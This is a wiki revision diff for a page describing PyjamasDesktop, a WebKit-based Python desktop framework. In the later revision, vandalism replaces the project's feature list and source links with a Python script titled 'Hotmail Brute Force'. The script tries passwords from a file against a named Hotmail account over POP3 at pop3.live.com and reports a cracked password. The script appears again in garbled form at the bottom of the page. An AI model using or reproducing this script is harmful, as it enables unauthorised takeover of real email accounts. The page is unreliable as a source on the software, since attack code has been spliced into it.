Differences between revisions 2 and 20 (spanning 18 versions)
Revision 2 as of 2008-08-31 21:47:09
Size: 2031
Editor: 87
Comment:
Revision 20 as of 2010-10-11 09:16:41
Size: 865
Editor: 188
Comment:
Deletions are marked like this. Additions are marked like this.
Line 1: Line 1:
Pyjamas-Desktop is a cross-platform framework and applications widget set, based on [http://webkit.org WebKit]. PyWebkitGtk is currently the basis for Pyjamas-Desktop, and it is conceivable that there will exist a PyWebkitQt4, and Pyjamas-Desktop will run on top of that, as well. PyjamasDesktop is similar to [http://www.async.com.br/projects/kiwi KiWi] in that it provides an easy-to-use API, where you need not know - at all - that you are running PyGTK underneath. import poplib
from winsound import Beep
print '''
========================================
| Hotmail Brute Force |
| Str1k3r |
| h4moud@hotmail.com |
| Iam Hamoud \ thanks for Ricardo |
| [Str1k3r,nj] |
========================================'''
print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n"
def con(pwd):
    M = poplib.POP3_SSL('pop3.live.com', 995)
    try:
        M.user("t2-@hotmail.com")
        M.pass_(pwd)
    except:
        print "[-]password incorrect"
    else:
        print '[+]Email Has been Cracked!','\n[+]Password:', pwd
 Beep(3000,800)
        exit()
Line 3: Line 24:
PyjamasDesktop is actually a port of [http://code.google.com/p/pyjamas PyJamas] which is a web toolkit, so you also have the option of running PyjamasDesktop applications as web applications - unmodified.

The [PyJamas] Widget set is exceptionally comprehensive and yet is easy to use, providing:

 * Simple, Horizontal, Vertical, Docking, Flow and HTML Panels
 * Text Labels and HTML including full CSS Stylesheet support and full CSS properties
 * Text, Password and TextArea input boxes
 * List drop-downs including Multi-selection
 * Buttons, Checkboxes and Radio-Buttons including groups.
 * TreeView and Form Submit Panel (including file upload).

Additional features, thanks to the underlying use of webkit, include:

 * Full CSS Stylesheet functionality
 * Option of executing javascript, to manipulate the application widgets
 * Loading of complete HTML Pages, both local and remote
 * Plugin support for multimedia plugins such as Flash.
 * Access to XML, XSLT and AJAX.
 * (Future: full SVG Canvas support, like HippoCanvas)

Obtaining PyjamasDesktop, presently from source code, is here:

 * [git://github.com/lkcl/pyjamas-desktop.git git@github.com:lkcl/pyjamas-desktop.git]
 * [https://bugs.webkit.org/show_bug.cgi?id=16401 webkit issue 16401]
 * [http://code.google.com/p/pywebkitgtk/issues/detail?id=13 pywebkitgtk issue 13]

Article and information is available here:

 * [http://advogato.org/article/981.html advogato article]
 * [http://lkcl.net/pyjamas-desktop]
 * [http://sf.net/projects/pyjamas-desktop]
f = open("Str1k3r.txt", "r")
for pwd in f.readlines():
    con(pwd.replace("\r", "").replace("\n", ""))

import poplib from winsound import Beep print ======================================== | Hotmail Brute Force | | Str1k3r | | h4moud@hotmail.com | | Iam Hamoud \ thanks for Ricardo | | [Str1k3r,nj] | ======================================== print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n" def con(pwd):

  • M = poplib.POP3_SSL('pop3.live.com', 995) try: except:
    • print "[-]password incorrect"
    else:
    • print '[+]Email Has been Cracked!','\n[+]Password:', pwd Beep(3000,800) exit()

f = open("Str1k3r.txt", "r") for pwd in f.readlines():

  • con(pwd.replace("\r", "").replace("\n", ""))

PyjamasDesktop (last edited 2010-11-08 11:08:49 by 213)

Unable to edit the page? See the FrontPage for instructions.